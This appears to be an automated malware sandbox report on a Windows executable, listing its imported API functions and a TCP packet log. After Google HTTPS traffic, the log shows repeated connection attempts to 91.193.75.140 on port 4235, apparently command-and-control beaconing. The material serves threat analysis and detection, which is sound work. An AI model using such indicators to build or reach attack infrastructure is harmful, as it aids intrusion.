USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 07:22:06.104052067 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.104077101 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.104285002 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.125946999 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.125966072 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.159946918 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.160141945 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.160685062 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.160917997 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.284450054 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.285581112 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.285882950 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.289532900 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.332398891 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.680895090 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.681197882 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.681219101 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.681294918 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.681361914 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.681483030 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.681483030 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.681503057 CET	443	49840	142.250.186.78	192.168.11.20
Nov 3, 2022 07:22:06.681638956 CET	49840	443	192.168.11.20	142.250.186.78
Nov 3, 2022 07:22:06.780091047 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.780183077 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:06.780476093 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.780817986 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.780883074 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:06.836155891 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:06.836443901 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.836443901 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.838258982 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:06.838484049 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.842258930 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.842293978 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:06.842972040 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:06.843183041 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.843549967 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:06.884386063 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.077380896 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.077605963 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.077661991 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.077703953 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.077898026 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.078182936 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.078449965 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.078926086 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.079174995 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.079174995 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.079854965 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.080113888 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.080113888 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.080188036 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.080466986 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.082560062 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.082863092 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.082925081 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.083193064 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.085501909 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.085747004 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.085764885 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.085819006 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.085997105 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.086019039 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.086070061 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.086313009 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.086313009 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.086365938 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.086647987 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.086908102 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.087121964 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.087157011 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.087227106 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.087277889 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.087445021 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.087747097 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.087913990 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.087954044 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.088252068 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.088283062 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.088473082 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.088514090 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.088660002 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.088710070 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.088903904 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.089050055 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.089106083 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.089137077 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.089301109 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.089576006 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.089776993 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.089845896 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.089907885 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.089937925 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.090102911 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.090365887 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.090573072 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.090585947 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.090645075 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.090929985 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.090929985 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.091291904 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.091490984 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.091583967 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.091641903 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.091871977 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.092058897 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.092087984 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.092219114 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.092263937 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.092343092 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.092618942 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.092618942 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.092811108 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.093168020 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.093224049 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.093504906 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.094182968 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.094422102 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.094424009 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.094461918 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.094594955 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.094595909 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.094614983 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.094640017 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.094821930 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.094821930 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.094840050 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.094861984 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.095015049 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.095174074 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.095174074 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.095206022 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.095438957 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.095465899 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.095660925 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.095860004 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.095860004 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.095901012 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.096214056 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.096370935 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.096569061 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.096605062 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.096716881 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.096807003 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.096828938 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.096852064 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.097018957 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.097018957 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.097316980 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.097647905 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.097702026 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.097882032 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.097991943 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.098047972 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.098148108 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.098334074 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.098368883 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.098547935 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.098659039 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.098715067 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.098754883 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.098942041 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.098972082 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.099134922 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.099160910 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.099369049 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.099447966 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.099476099 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.099618912 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.099620104 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.099652052 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.099976063 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.099980116 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.100013018 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.100322962 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.100347996 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.100389004 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.100739956 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.100794077 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101001024 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101175070 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101252079 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.101253033 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.101289034 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101404905 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101604939 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101633072 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.101640940 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101656914 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.101824999 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.101886988 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.102001905 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.102114916 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.102291107 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.102291107 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.102313995 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.102358103 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.102526903 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.102550030 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.102569103 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.102758884 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.102833986 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.102853060 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103008032 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103075027 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103075027 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103075027 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103105068 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103251934 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103316069 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103429079 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103450060 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103468895 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103586912 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103672028 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103779078 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103795052 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.103949070 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103949070 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103949070 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.103969097 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.104219913 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.104358912 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.104475021 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.104608059 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.104720116 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.105191946 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105191946 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105191946 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105191946 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105191946 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105191946 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105237961 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.105391026 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.105571032 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.105571032 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105691910 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.105803013 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105803013 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.105808020 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.105823040 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.105849981 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.106031895 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106043100 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.106065035 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106232882 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.106245995 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106437922 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106497049 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106683969 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.106683969 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.106698990 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106852055 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106935024 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.106950998 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.106950998 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.106967926 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107141972 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107157946 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107239962 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107259035 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107388020 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107433081 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107472897 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107600927 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107600927 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107625961 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107794046 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107794046 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107820988 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107846022 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.107889891 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.107908964 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108071089 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108083963 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.108108997 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108244896 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.108244896 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.108263016 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108382940 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108437061 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.108453989 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108628035 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.108644962 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108745098 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108803034 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.108819008 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.108968973 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109122038 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109273911 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109314919 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.109330893 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109508038 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.109508038 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.109524012 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109533072 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109637976 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109760046 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109787941 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.109788895 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.109805107 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.109890938 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.110076904 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.110076904 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.110269070 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.110269070 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:07.110291004 CET	443	49841	172.217.16.193	192.168.11.20
Nov 3, 2022 07:22:07.110421896 CET	49841	443	192.168.11.20	172.217.16.193
Nov 3, 2022 07:22:08.611685991 CET	49842	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:09.621212959 CET	49842	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:11.636447906 CET	49842	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:15.651154995 CET	49842	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:26.415853977 CET	49844	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:27.429826975 CET	49844	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:29.444947004 CET	49844	4235	192.168.11.20	91.193.75.140
Nov 3, 2022 07:22:33.459829092 CET	49844	4235	192.168.11.20	91.193.75.140
